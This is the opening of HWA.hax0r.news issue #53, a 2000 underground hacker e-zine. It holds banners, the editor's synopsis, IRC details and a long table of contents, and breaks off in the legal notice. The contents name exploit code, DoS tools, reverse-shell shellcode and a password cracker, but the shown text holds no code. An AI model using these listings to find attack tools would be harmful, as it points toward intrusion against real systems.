-=-=-=-=-=-=-
[63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
= <=-[ HWA.hax0r.news ]-=> =
==========================================================================
[=HWA 2000=] Number 53 Volume 2 Issue 5 1999 April-May 2000
==========================================================================
[ 61:20:6B:69:64:20:63:6F:75: ]
[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================
= "ABUSUS NON TOLLIT USUM" =
==========================================================================
Have you heard the news?
Editor: Cruciphux (cruciphux@dok.org)
A Hackers Without Attitudes Production. (c) 1999, 2000
http://welcome.to/HWA.hax0r.news/
http://hwa-security.net/
Site is live, grand opening coming soon!
*** NEW WEB BOARD NOW ACTIVE ***
http://discserver.snap.com/Indices/103991.html
==========================================================================
= =
= ____ =
= / ___|_____ _____ _ __ __ _ __ _ ___ =
= | | / _ \ \ / / _ \ '__/ _` |/ _` |/ _ \ =
= | |__| (_) \ V / __/ | | (_| | (_| | __/ =
= \____\___/ \_/ \___|_| \__,_|\__, |\___| =
= |___/ =
= =
= =
This is #53 covering April 10th to May 7th, 2000
= See words from Editor on note about this issue and #54 =
= =
= ** 636 People are on the email notify list as of this writing. =
= =
= =
= see note below in the Help Out! section re:distribution. =
= =
= =
= =
==========================================================================
_ _ _ ___ _ _
| | | | ___| |_ __ / _ \ _ _| |_| |
| |_| |/ _ \ | '_ \| | | | | | | __| |
| _ | __/ | |_) | |_| | |_| | |_|_|
|_| |_|\___|_| .__/ \___/ \__,_|\__(_)
|_|
If you'd like to help there are many things you can do, for full details
mail me and I'll send you a file of suggestions and jobs that need to be
handled. You can choose what you want to do, in your email you may want
to mention if you are interested or have experience in areas such as:
* cgi programming
* php programming
* file archive maintenance
* message forum moderator
* news article collector <- We can never have enough of these!
* mailing list monitoring
* watch for and report interesting updates on selected web sites
Plus others.
@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@
# #
@ The HWA website is sponsored by CUBESOFT communications I highly @
# recommend you consider these people for your web hosting needs, #
@ @
# Web site sponsored by CUBESOFT networks http://www.csoft.net #
@ check them out for great fast web hosting! @
# #
# http://www.csoft.net/~hwa @
@ #
@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
____ _
/ ___| _ _ _ __ ___ _ __ ___(_)___
\___ \| | | | '_ \ / _ \| '_ \/ __| / __|
___) | |_| | | | | (_) | |_) \__ \ \__ \
|____/ \__, |_| |_|\___/| .__/|___/_|___/
|___/ |_|
SYNOPSIS (READ THIS)
--------------------
The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news
and anything else I think is worthy of a look see. (remember I'm doing
this for me, not you, the fact some people happen to get a kick/use
out of it is of secondary importance).
This list is NOT meant as a replacement for, nor to compete with, the
likes of publications such as CuD or PHRACK or with news sites such as
AntiOnline, the Hacker News Network (HNN) or mailing lists such as
BUGTRAQ or ISN nor could any other 'digest' of this type do so.
It *is* intended however, to complement such material and provide a
reference to those who follow the culture by keeping tabs on as many
sources as possible and providing links to further info, it's a labour
of love and will be continued for as long as I feel like it, I'm not
motivated by dollars or the illusion of fame, did you ever notice how
the most famous/infamous hackers are the ones that get caught? there's
a lot to be said for remaining just outside the circle... <g>
@HWA
=-----------------------------------------------------------------------=
Welcome to HWA.hax0r.news ...
=-----------------------------------------------------------------------=
"If life is a waste of time and time is a waste of life, then let's all get
wasted and have the time of our lives"
- kf
____| _| |
__| | __ \ _ \ __|
| __| | | __/ |
_____|_| _| _|\___|\__|
Catch us on Internet Relay Chat, Eris Free Net... /join #HWA.hax0r.news
**************************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' when keyed ***
*** ***
*** please join to discuss or impart news on the zine and around the ***
*** scene or just to hang out, we get some interesting visitors you ***
*** could be one of em. ***
*** ***
*** Note that the channel isn't there to entertain you; its purpose is ***
*** to bring together people interested and involved in the underground***
*** to chat about current and recent events etc, do drop in to talk or ***
*** hangout. Also if you want to promo your site or send in news tips ***
*** it's the place to be, just remember we're not #hack or #chatzone... ***
**************************************************************************
=--------------------------------------------------------------------------=
_____ _ _
/ ____| | | | |
| | ___ _ __ | |_ ___ _ __ | |_ ___
| | / _ \| '_ \| __/ _ \ '_ \| __/ __|
| |___| (_) | | | | || __/ | | | |_\__ \
\_____\___/|_| |_|\__\___|_| |_|\__|___/
=--------------------------------------------------------------------------=
[ INDEX ] HWA.hax0r.news #53 Apr/May 2000
=--------------------------------------------------------------------------=
Key Intros
=--------------------------------------------------------------------------=
00.0 .. LEGAL & COPYRIGHTS ..............................................
00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
00.2 .. THIS IS WHO WE ARE ..............................................
ABUSUS NON TOLLIT USUM?
This is (in case you hadn't guessed) Latin, and loosely translated
it means "Just because something is abused, it should not be taken
away from those who use it properly". This is our new motto.
=--------------------------------------------------------------------------=
Source Keys HWA.hax0r.news 2000
=--------------------------------------------------------------------------=
"The three most dangerous things in the world are a programmer with a
soldering iron, a hardware type with a program patch and a user with
an idea." - Unknown
[MM] - Articles from Mass Media sources (Wired MSNBC Reuters etc)
[IND] - Independent articles or unsolicited material.
[HWA] - Articles or interviews by HWA Staff members
[HNN] - Sourced from the Hacker News Network http://www.hackernews.com/
[HNS] - Sourced from Help Net Security http://net-security.org/
[403] - Sourced from 403-security http://www.403-security.net/
[ISN] - Articles from the ISN Mailing list (usually sourced from media)
[b0f] - Buffer Overflow Security release http://b0f.freebsd.lublin.pl/
[zsh] - ZSH release http://zsh.interniq.org/
[COR] - Correction to previous release.
=--------------------------------------------------------------------------=
Key Content HWA.hax0r.news 2000
=--------------------------------------------------------------------------=
<someguy> only a poor workman blames his tools, unless of course those tools
were written by Microsoft :)
<some1> lol
01.0 .. GREETS ...........................................................
01.1 .. Last minute stuff, rumours, newsbytes ............................
01.2 .. Mailbag ..........................................................
02.0 .. From the Editor...................................................
03.0 .. [IND]Hacking your way into a girlie's heart, etc by: ch1ckie.....
04.0 .. [HWA]Apr 12th:MPAA Site DoS'd off the net..............................
05.0 .. [b0f]Common WWW and CGI vulnerabilities list ......................
06.0 .. [IND]Project Gamma interviews SpaceRogue of HNN........................
07.0 .. [MM] MS Engineers plant secret anti-Netscape password .................
08.0 .. [b0f]Omni HTTPD Pro v2.06 for Win9x and NT DoS.....................
09.0 .. [MM]Judge bans Mitnick from taking part in tech conference ...........
10.0 .. [MM]The continuing saga of MAFIABOY king lemur of DDoS................
10.1 .. [MM]Mafiaboy reaction: "yeah right"...................................
10.2 .. [MM]Mafiaboy's dad gets busted for conspiracy ........................
10.3 .. [MM]On another mafiaboy note, a new site has popped up on Geocities...
10.4 .. [MM]Mafiaboy:Probe of Hacker Nets a Second Suspect: His Father .......
10.5 .. [MM]Mafiaboy:The Challenge of Fighting Cybercrime (Reno)..............
10.6 .. [MM]Mafiaboy:Janet Reno licks chops over Mafiaboy arrest..............
10.7 .. [MM]Mafiaboy:IS MAFIABOY REAL OR A CREATION OF THE MEDIA? ............
10.8 .. [MM]Mafiaboy:Canadian Feds charge Mafiaboy in DDoS attacks............
10.9 .. [MM]Mafiaboy:Canadian Teen Charged in Web Blitz.......................
11.0 .. [MM]Mafiaboy:Canada Arrests 'Mafiaboy' Hacker, Aged 15 ...............
11.1 .. [MM]Mafiaboy:Canadian Arrest Made in February Web Attacks ............
11.2 .. [MM]Mafiaboy:Reno Says 'Mafiaboy' Hacker Must Face Punishment ........
11.3 .. [MM]Mafiaboy:FBI Has Evidence That He and Others Launched Web Attacks.
11.4 .. [MM]Mafiaboy:Hacker cripples Area 51 site for 36 hours................
12.0 .. [ISN]Mafiaboy:Dispelling some myths, did he really hack? etc..........
13.0 .. [MM]Cybercrime Solution Has Bugs .....................................
14.0 .. [IND]The new spank.c DoS tool source and an analysis paper by 1st.....
15.0 .. [IND] RFParalyse.c:Cause undesired effects remotely against Win9x.....
16.0 .. [MM] New worm: ILOVEYOU spreads via e-mail attachments................
17.0 .. [HWA] May 4th 2000: SugarKing interviews ph33r the b33r...............
18.0 .. [SEC] Security Bulletins Digest May 02nd 2000.........................
19.0 .. [b0f] Latest releases from Buffer Overflow Security...................
20.0 .. [HWA] Informal chat/interview with Mixter ............................
21.0 .. [b0f] b0f3-ncurses.txt FBSD 3.4 libncurses buffer overflow by venglin.
22.0 .. [b0f] b0f2-NetOp.txt NetOp, Bypass of NT Security to retrieve files ..
23.0 .. [b0f] b0f1-Mailtraq.txt Mailtraq remote file retrieving ..............
24.0 .. [b0f] Exploit/DoS /makes Timbuktu Pro 2.0b650 stop responding ........
25.0 .. [b0f] ides.c:'Intrusion Detection Evasion System'.....................
26.0 .. [b0f] lscan2.c Lamerz Scan, a small fork()ing scanner.................
27.0 .. [b0f] Pseudo Cryptographic Filesystem.................................
28.0 .. [b0f] mtr-0.41 (freebsd) local root exploit...........................
29.0 .. [b0f] shellcode that connects to a host&port and starts a shell.......
30.0 .. [b0f] NT Security check paper part 2 by Slash.........................
31.0 .. [IND] The apache.org hack. by {} and Hardbeat (Apr 4th 2000)..........
32.0 .. [IND] The Goat Files: mindphasr talks more about his bust.............
33.0 .. [IND] The Goat Files: "Hackers unite - a goat security expose"........
34.0 .. [MM] Napster boots 317,377 users......................................
35.0 .. [MM] ytcracker busted for web defacement..............................
36.0 .. [HNN] Junger wins in Appeals Court-Code Declared Speech ..............
37.0 .. [HNN] Bullet to Scan Hard Drives of Web Site Visitors ................
38.0 .. [HNN] Links to Web Sites Illegal......................................
39.0 .. [HNN] British Companies Complacent ...................................
40.0 .. [HNN] Trio Becomes First Internet Crime Conviction for Hong Kong .....
41.0 .. [HNN] Census Afraid of Electronic Intrusion ..........................
42.0 .. [HNN] Hardware Key Logger Introduced .................................
43.0 .. [HNN] Napalm Issue 4 .................................................
44.0 .. [HNN] EU Set To Rewrite Human Rights .................................
45.0 .. [HNN] Dutch Want Their Own Echelon ...................................
46.0 .. [HNN] SPAM Goes Wireless .............................................
47.0 .. [HNN] Forget Fort Knox Now It's Fort Net .............................
48.0 .. [HNN] TrustedBSD Announced ...........................................
49.0 .. [HNN] 690,000 Illegal Web Pages on the Net ...........................
50.0 .. [HNN] Attacking the Attackers ........................................
51.0 .. [HNN] More EZines Released ...........................................
51.1 .. [IND] HYPE - w00w00 zine..............................................
52.0 .. [HNN] Max Vision Goes to Court .......................................
53.0 .. [HNN] Mitnick On the Corporate Conference Circuit ....................
54.0 .. [HNN] AOL Liable for Music Piracy ....................................
55.0 .. [HNN] Canadian ISP Reveals Credit Card Numbers .......................
56.0 .. [HNN] Vatis Concerned About Spoofing .................................
57.0 .. [HNN] L0pht Releases CRYPTOCard Vulnerabilities ......................
58.0 .. [HNN] Phone Company's Announce Security Initiative ...................
59.0 .. [HNN] Microsoft Admits to Backdoor in Server Software ................
60.0 .. [HNN] Backdoor Found in E-Commerce Software ..........................
61.0 .. [HNN] MostHateD Pleads Guilty ........................................
62.0 .. [HNN] NSA And CIA Deny Echelon is Used Domestically ..................
63.0 .. [HNN] Keyboard Monitoring Becoming More Popular with Business ........
64.0 .. [HNN] Japanese Cult Wrote Software for Navy ..........................
65.0 .. [HNN] MPAA Suspects Denial of Service Attack .........................
66.0 .. [HNN] Even More E-zines ..............................................
67.0 .. [HNN] BackDoor Now Called a Bug ......................................
68.0 .. [HNN] North Carolina Plagued by 'hackers' ............................
69.0 .. [HNN] Web Sites Redirected, Serbians Blamed ..........................
70.0 .. [HNN] Metallica Sues Napster, Gets Web Site Defaced ..................
71.0 .. [HNN] Japan To Control PS Exports, Fears Weapon Use ..................
72.0 .. [HNN] Spy Laptop Goes Missing ........................................
73.0 .. [HNN] Napster Users May Get Jail .....................................
74.0 .. [HNN] Brazil Tax Records on the Loose ................................
75.0 .. [HNN] SingNet Suffers Abuse From Overseas ............................
76.0 .. [HNN] Attrition Graphs ...............................................
77.0 .. [HNN] Wide Open Source ...............................................
78.0 .. [HNN] Mafiaboy Charged for DDoS Attacks ..............................
79.0 .. [HNN] TerraServer Downtime Blamed on Malicious Activity ..............
80.0 .. [HNN] Ranum To Receives Clue Award ...................................
81.0 .. [HNN] Ireland Eases Restrictions on Encryption Export Procedures .....
82.0 .. [HNN] Web Defacement Supports Separatists ............................
83.0 .. [HNN] Exploits Protected by Copyright ................................
84.0 .. [HNN] The Erosion of Privacy on the Net ..............................
85.0 .. [HNN] MafiaBoy Released on Bail ......................................
86.0 .. [HNN] Mitnick Banned from Speaking ...................................
87.0 .. [HNN] Top Politicos Meet to Discuss Infrastructure Security ..........
88.0 .. [HNN] NSF To Issue Grants for Security Schooling .....................
89.0 .. [HNN] CalPoly Charges Student with Port Scanning .....................
90.0 .. [HNN] Encrypted Sheet Music Available on Net Soon ....................
91.0 .. [HNN] ISPs Still Vulnerable to SNMP Holes ............................
92.0 .. [HNN] Internet Security Act of 2000 ..................................
93.0 .. [HNN] PSINet Hit with DoS Attack .....................................
94.0 .. [HNN] Satellite Jammer Plans on Net ..................................
95.0 .. [HNN] GNIT Vulnerability Scanner Released ............................
96.0 .. [HNN] Free MafiaBoy ..................................................
97.0 .. [HNN] MafiaBoy News Roundup ..........................................
98.0 .. [HNN] Members of HV2k Raided .........................................
99.0 .. [HNN] Piracy Legal In Italy, Sort of .................................
100.0 .. [HNN] Palm VII Considered Security Threat ............................
101.0 .. [HNN] Navy Intranet National Security Risk? ..........................
102.0 .. [HNN] Mitnick Upset Over Claims Made by UITA .........................
103.0 .. [HNN] Holiday Message from Disney Leaked .............................
104.0 .. [HNN] Attrition Updates Mailing List .................................
105.0 .. [HNN] MafiaBoy's Friends Under Investigation .........................
106.0 .. [HNN] Backdoor Found in Redhat .......................................
107.0 .. [HNN] USC Stands Their Ground ........................................
108.0 .. [HNN] Critics Chide COPPA - Disney Plan Criticized ...................
109.0 .. [HNN] Happy CIH Virus Day ............................................
110.0 .. [HNN] AboveNet Hit with DDoS .........................................
111.0 .. [HNN] Thailand Has No Software Industry Due To Piracy ................
112.0 .. [HNN] War Plans Found on Net .........................................
113.0 .. [HNN] India May get New Cyber Laws ...................................
114.0 .. [HNN] Napster Backs 'Bizkit ..........................................
115.0 .. [HNN] Dr. Dre Sues Students for Napster Use ..........................
116.0 .. [HNN] Chernobyl Hits South Korea .....................................
117.0 .. [HNN] Russian Gas Supplier Invaded by Cyber Criminals ................
118.0 .. [HNN] G8 Plans Cyber Security Conference .............................
119.0 .. [HNN] Cyber Crime Institute Established ..............................
120.0 .. [HNN] Domain Lock Down Launched ......................................
121.0 .. [HNN] Backdoor Found in Shopping Cart Software .......................
122.0 .. [HNN] FBI Investigating AboveNet DoS .................................
123.0 .. [HNN] Intel Removes ID Feature From New Chips ........................
124.0 .. [HNN] Another HotMail Hole Patched ...................................
125.0 .. [HNN] Iron Feather Collection at Risk ................................
126.0 .. [HNN] Rubicon This Weekend, H2K Announcement .........................
127.0 .. [HNN] Laptop Issues Justice in Brazil ................................
128.0 .. [HNN] CCPA and ECPA not Applicable ...................................
129.0 .. [HNN] McAfee Redefines Trojan ........................................
130.0 .. [HNN] Mitnick Back in Court ..........................................
131.0 .. [HNN] MI5 To Build Email Eavesdropping Center ........................
132.0 .. [HNN] French ISP Wannado Vulnerable ..................................
133.0 .. [HNN] Russia Arrests 55 in Credit Card Scheme ........................
134.0 .. [HNN] BTopenworld Suffers Information Leakage ........................
135.0 .. [HNN] Nmap 2.5 Released ..............................................
136.0 .. [HNN] Washington State Announces CLEW Agreement ......................
137.0 .. [HNN] New York Times Links to DeCSS ..................................
138.0 .. [HNN] More E-zines ...................................................
139.0 .. [HNN] mStream Joins Trinoo, TFN and Stacheldraht .....................
140.0 .. [HNN] Phrack 56 Released .............................................
141.0 .. [HNN] Tech Crimes Get Double Sentences ...............................
142.0 .. [HNN] Numbers Numbers Who has the Numbers ............................
143.0 .. [HNN] Password Thief in Hong Kong Behind Bars ........................
144.0 .. [HNN] FMA and SM Release CD ..........................................
145.0 .. [HNN] Metallica Claims It has 300,000 Individual Names of Napster Users
146.0 .. [HNN] President Sets GPS to Full Force ...............................
147.0 .. [HNN] New Cyber Crime Treaty Making the Rounds .......................
148.0 .. [HNN] Vulnerabilities Found in FileMaker .............................
149.0 .. [HNN] Internet Threat gets Four Months ...............................
150.0 .. [HNN] Dissemination of Pager Traffic Not Needed For Violation of Law .
151.0 .. [HNN] 2600 Secures Big Time Lawyer ...................................
152.0 .. [HNN] Virus Says 'I Love You' ........................................
153.0 .. [HNN] Quake III Flaw Leaves Users Vulnerable .........................
154.0 .. [HNN] Phone Taps on the Rise .........................................
155.0 .. [HNN] Minors Loose Rights In Georgia .................................
156.0 .. [HNN] 'I Love You' ...................................................
157.0 .. [HNN] Microsoft Employee Busted for Piracy ...........................
158.0 .. [HNN] Cisco Insider Convicted of Stealing PIX Source .................
159.0 .. [HNN] British Plan to Monitor Net ....................................
160.0 .. [HNN] MPAA Tries to Ban 2600 Lawyer ..................................
161.0 .. [HNN] Apache.org Defaced .............................................
162.0 .. [HNN] Voice Security on the Cheap ....................................
163.0 .. [HNN] Takedown Reviewed ..............................................
164.0 .. [HNS] Apr 8:NEW KIND OF SECURITY SCANNER..............................
165.0 .. [HNS] April 8:WAYS TO ATTACK..........................................
166.0 .. [HNS] April 7:STOLEN ACCOUNTS.........................................
167.0 .. [HNS] April 7:JAILED FOR SIX MONTHS...................................
168.0 .. [HNS] April 7: PcANYWHERE WEAK PASSWORD ENCRYPTION....................
169.0 .. [HNS] April 7: NET PRIVACY TOOLS......................................
170.0 .. [HNS] April 7:SECURITY ADDITIONS......................................
171.0 .. [HNS] April 7:COOKIES.................................................
172.0 .. [HNS] April 7:SECURE E-MAIL SERVICE...................................
173.0 .. [HNS] April 7:ONLINE MUGGERS..........................................
174.0 .. [HNS] April 6:SURVEY BY DTI...........................................
175.0 .. [HNS] April 6: COMPUTER CODES PROTECTED...............................
176.0 .. [HNS] April 6: RELEASED AFTER CODE MACHINE THEFT......................
177.0 .. [HNS] April 6:CYBERPATROL BLOCK LIST..................................
178.0 .. [HNS] April 5:CRYPTO REGULATIONS......................................
179.0 .. [HNS] April 5:GFI AND NORMAN TEAM UP..................................
180.0 .. [HNS] April 5:MASTERCARD OFFER VIRUS REPAIR SERVICE...................
181.0 .. [HNS] April 5: BUFFER OVERFLOWS.......................................
182.0 .. [HNS] April 5: PIRACY.................................................
183.0 .. [HNS] April 5:BIGGEST PUBLIC-KEY CRYPTO CRACK EVER....................
184.0 .. [HNS]: April 5:GROUP APPEALS DVD CRYPTO INJUNCTION....................
185.0 .. [HNS] April 5: VIRUS BLOWS A HOLE IN NATO'S SECURITY..................
186.0 .. [HNS] April 4: FIGHT SPAM WITH SPAM...................................
187.0 .. [HNS] April 4:REALPLAYER BUFFER OVERFLOW..............................
188.0 .. [HNS] May 31st:NO PROBLEMS?...........................................
189.0 .. [HNS] May 31:MS SECURITY BULLETIN #38.................................
190.0 .. [HNS] May 31: BURGLAR ALARM CATCHES ATTACKERS ON THE NET..............
191.0 .. [HNS] May 31: SENATE EYES GUARD FOR INFO SECURITY.....................
192.0 .. [HNS] May 31: TURBOLINUX SECURITY ANNOUNCEMENT........................
193.0 .. [HNS] May 31:NAI ON VBS FIREBURN WORM................................
194.0 .. [HNS] May 31:INTERNET GUARD DOG PRO...................................
195.0 .. [HNS] May 31: FRANK VAN VLIET INTERVIEW...............................
196.0 .. [HNS] May 31: MISSING FILES...........................................
197.0 .. [HNS] May 31: THE MYTH OF OPEN SOURCE SECURITY........................
198.0 .. [HNS] May 31:INFORMATION SHARING MECHANISM............................
199.0 .. [HNS] May 31:WAP RELATED DEFACEMENT...................................
200.0 .. [HNS] May 31:RUNNING A BSD-BASED FIREWALL.............................
201.0 .. [HNS] May 24:LAPTOPS STOLEN FROM PARLIAMENT...........................
202.0 .. [HNS] May 24: MICROSOFT PROGRAMS VULNERABLE TO VIRUSES................
203.0 .. [HNS] May 24:INTRUSION DETECTION ON LINUX.............................
204.0 .. [HNS] May 24:CRACKED! PART 3: HUNTING THE HUNTER......................
205.0 .. [HNS] May 24: THE NEXT GENERATION OF ILOVEYOU:THE PORN WORM...........
206.0 .. [HNS] May 23:PAPERS SENT TO PROSECUTOROS..............................
207.0 .. [HNS] May 23:INFOEXPRESS AND NETWORK UTIL. AGREEMENT..................
208.0 .. [HNS] May 23:FREE EXPORT OF ENCRYPTION SOFTWARE.......................
209.0 .. [HNS] May 23:NAI GAUNTLET FIREWALL VULNERABILITY......................
210.0 .. [HNS] May 22: CISCO SECURE PIX FIREWALL PROBLEMS......................
211.0 .. [HNS] May 22:INDIA AND CYBER CRIME....................................
212.0 .. [IND] CERT� Advisory CA-2000-05 NS Improper SSL validation............
213.0 .. [MM] IBM will only hire immitation hackers............................
214.0 .. [IND] BUGTRAQ: "Vulnerability statistics database"....................
215.0 .. [MM] Big Brother has your file........................................
216.0 .. [MM] Napster gets tough with Metallica................................
217.0 .. [IND] The Slashdot DDoS attack: What happened?........................
218.0 .. [IND] China Executes Bank Manager for Computer Crime..................
219.0 .. [IND] Data Transmission Pioneer Passes Away...........................
220.0 .. [IND] Canada Agrees to Drop Big Brother Files........................
221.0 .. [IND] Senate Bill Will Make Minor Computer Hacking a Felony...........
222.0 .. [IND] McAfee considers Netbus pro legitimate tool.....................
223.0 .. [HWA] The Hoax "When hackers get bored..."............................
224.0 .. [IND] XFree86 3.3.6 buffer overflow to root compromise................
225.0 .. [MM] Power your PC with a potato!.....................................
226.0 .. [MM] Mobile phones fertile for E-bugs.................................
227.0 .. [MM] The virtual threat...............................................
228.0 .. [b0f] Qpopper exploit code............................................
229.0 .. [b0f] Wingate advisory................................................
230.0 .. [b0f] ILOVEYOU Virus analysis and removal.............................
231.0 .. [IND] Intrusion detection on Linux....................................
232.0 .. [IND] scan.txt Spitzner gets an unusual scan..........................
233.0 .. [IND] local ssh 1.2.27 dos attack.....................................
234.0 .. [IND] ascend router remote exploit by loneguard.......................
235.0 .. [IND] ascend router remote dos exploit by rfp.........................
236.0 .. [IND] citrix router local exploit by dug song.........................
237.0 .. [IND] ascend router remote dos attack by msg.net......................
238.0 .. [IND] cisco/ascend router remote exploit. posted by mixter............
239.0 .. [IND] remote ssh 1.2.27 remote overflow by Core SDI SA................
240.0 .. [IND] '0-day' jolt2.c poc code........................................
241.0 .. [IND] cisco remote dos attack.........................................
242.0 .. [IND] linux local misc overflow by jim paris..........................
243.0 .. [IND] linux remote misc overflow by noir..............................
244.0 .. [IND] linux remote misc overflow by jim paris.........................
245.0 .. [IND] ascend remote dos attack........................................
246.0 .. [IND] ftp-ozone.c cisco remote bug by dug song........................
247.0 .. [IND] reset_state.c cisco remote dos attack by vortexia...............
248.0 .. [IND] ftpexp.c (Version 6.2/Linux-0.10) ftpd overflow by digit........
249.0 .. [IND] killsentry.c linux/misc remote port sentry killer by vortexia...
250.0 .. [IND] xsol-x.c mandrake 7.0 local overflow by lwc.....................
251.0 .. [IND] klogind.c bsdi 4.0.1 remote overflow by duke....................
252.0 .. [IND] pmcrash.c router/livingston remote dos attack...................
253.0 .. [IND] cisco-connect.c cisco dos attack by tiz.telesup.................
254.0 .. [IND] ascend.c ascend remote dos attack by the posse..................
255.0 .. [IND] ciscocrack.c / ciscocrack.pl cisco password cracker.............
256.0 .. [IND] l0phtl0phe-kid.c remote linux misc overflow by scut/teso........
257.0 .. [IND] RFPickaxe.pl winnt remote exploit...............................
258.0 .. [IND] cproxy.c winnt remote dos attack by |[TDP]|.....................
259.0 .. [IND] fdmnt-smash2.c slackware 7.0 local exploit by Scrippie..........
260.0 .. [IND] nis-spoof.c remote rpc exploit..................................
261.0 .. [IND] bugzilla.pl remote cgi exploit by karin........................
262.0 .. [IND] netsol.c remote cgi exploit by bansh33.........................
263.0 .. [IND] napstir.c remote linux misc exploit by S.......................
264.0 .. [IND] SSG-arp.c aix 4.1 local overflow by cripto.....................
265.0 .. [IND] warftpd.c win95 remote dos attack by eth0......................
266.0 .. [IND] sniffit.c remote linux misc overflow by fusys..................
267.0 .. [IND] pam_console.c redhat (6.2/6.1/6.0) local exploit...............
268.0 .. [IND] routedsex.c slackware 7 remote dos attack by xt................
269.0 .. [IND] omni-httpd.sh win98 remote dos attack by sirius................
270.0 .. [IND] RFParalyze.c win(95/98) remote dos attack by rfp...............
271.0 .. [IND] www.c novel (4.11/4.1) remote dos attack by venglin...........
272.0 .. [IND] elm-smash.c slackware 4.0 local overflow by Scrippie...........
273.0 .. [IND] ADMDNews.zip win(nt/2k) remote overflow by ADM.................
274.0 .. [IND] netprex.c Solaris (2.6/7) local overflow by cheez whiz.(fixed).
275.0 .. [IND] gnomelib.sh suse (6.4/6.3) local overflow by bladi & almudena..
276.0 .. [IND] piranha remote redhat 6.2 exploit..............................
277.0 .. [IND] xdnewsweb.pl remote cgi exploit by djhd........................
278.0 .. [IND] nslookup.c local linux misc overflow by lore...................
279.0 .. [IND] syslogd.c local linux misc dos attack by lore. ................
280.0 .. [IND] 3man.c local redhat 6.1 overflow by kil3r of lam3rz............
281.0 .. [IND] (linux)Mail[8.1] local buffer overflow, by v9..................
282.0 .. [ISN] How to hack a bank.............................................
283.0 .. [ISN] Spain hackers sabotage museum site.............................
284.0 .. [ISN] Hackers: Cyber saviours or snake-oil salesmen?.................
285.0 .. [ISN] U.S to beef up Cyber Defenses..................................
286.0 .. [ISN] Javascript-in-cookies Netscape hole + MS hole..................
287.0 .. [ISN] Intel plans to giveaway security software via web..............
288.0 .. [ISN] Companies boosting security for web sites......................
289.0 .. [ISN] Price Waterhouse Coopers tackles web security..................
290.0 .. [ISN] Hackers, cybercops, continue cat-and-mouse game................
291.0 .. [ISN] Navy intranet a security threat?...............................
292.0 .. [ISN] Hackers break into Romanian senate's web site..................
293.0 .. [ISN] FBI investigating new web attack...............................
294.0 .. [ISN] Backdoor exposes credit cards..................................
295.0 .. [ISN] Qualcomm warns of Eudora security hole.........................
296.0 .. [ISN] Infamous computer hacker under fire............................
297.0 .. [ISN] Palm VII banned from lab as security threat....................
298.0 .. [ISN] What firewalls will look like in 2003..........................
299.0 .. [ISN] Mitnick reacts to speaking ban.................................
300.0 .. [ISN] RealNetworks patches video server vulnerability................
301.0 .. [ISN] Group behaviour and security...................................
302.0 .. [ISN] Record encryption puzzle cracked...............................
303.0 .. [ISN] Expert warns of powerful new hacker tool.......................
304.0 .. [IND] mstream source and analysis....................................
305.0 .. [ISN] CRYPTO-GRAM Newsletter April 15th 2000.........................
306.0 .. [ISN] Suspected hackers arrested in Russian credit card fraud........
307.0 .. [ISN] Microsoft zaps Hotmail password bug............................
308.0 .. [ISN] Cybercrime solution has bugs...................................
309.0 .. [ISN] Government plans computer lock-down............................
310.0 .. [HWA] phonic dumps on hack.co.za and gov-boi .......................
311.0 .. [IND] IP Sniffing and Spoofing.......................................
=-------------------------------------------------------------------------=
AD.S .. Post your site ads or etc here, if you can offer something in
return thats tres cool, if not we'll consider ur ad anyways so
send it in.ads for other zines are ok too btw just mention us
in yours, please remember to include links and an email contact.
Ha.Ha .. Humour and puzzles ............................................
Oi! laddie! send in humour for this section! I need a laugh
and its hard to find good stuff... ;)...........................
SITE.1 .. Featured site, .................................................
H.W .. Hacked Websites ...............................................
A.0 .. APPENDICES......................................................
* COMMON TROJAN PORTS LISTING.....................................
A.1 .. PHACVW linx and references......................................
A.2 .. Hot Hits (.gov and .mil + other interesting traffic on our site)
A.3 .. Mirror Sites list...............................................
A.4 .. The Hacker's Ethic 90's Style..................................
A.5 .. Sources........................................................
A.6 .. Resources......................................................
A.7 .. Submission information.........................................
A.8 .. Mailing lists information......................................
A.9 .. Whats in a name? why HWA.hax0r.news??..........................
A.10 .. HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again).
A.11 .. Underground and (security?) Zines..............................
* Feb 2000 moved opening data to appendices, A.2 through A.10, probably
more to be added. Quicker to get to the news, and info etc... - Ed
=--------------------------------------------------------------------------=
@HWA'99, 2000
00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
_ _
| | ___ __ _ __ _| |
| | / _ \/ _` |/ _` | |
| |__| __/ (_| | (_| | |
|_____\___|\__, |\__,_|_|
|___/
THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF
THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE
RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND
IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS
(SEE FAQ).
Important semi-legalese and license to redistribute:
YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE
GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS
Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINK'S
ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is
http://welcome.to/HWA.hax0r.news IT IS NOT MY INTENTION TO VIOLATE
ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE IN ANY WAY IF YOU FEEL
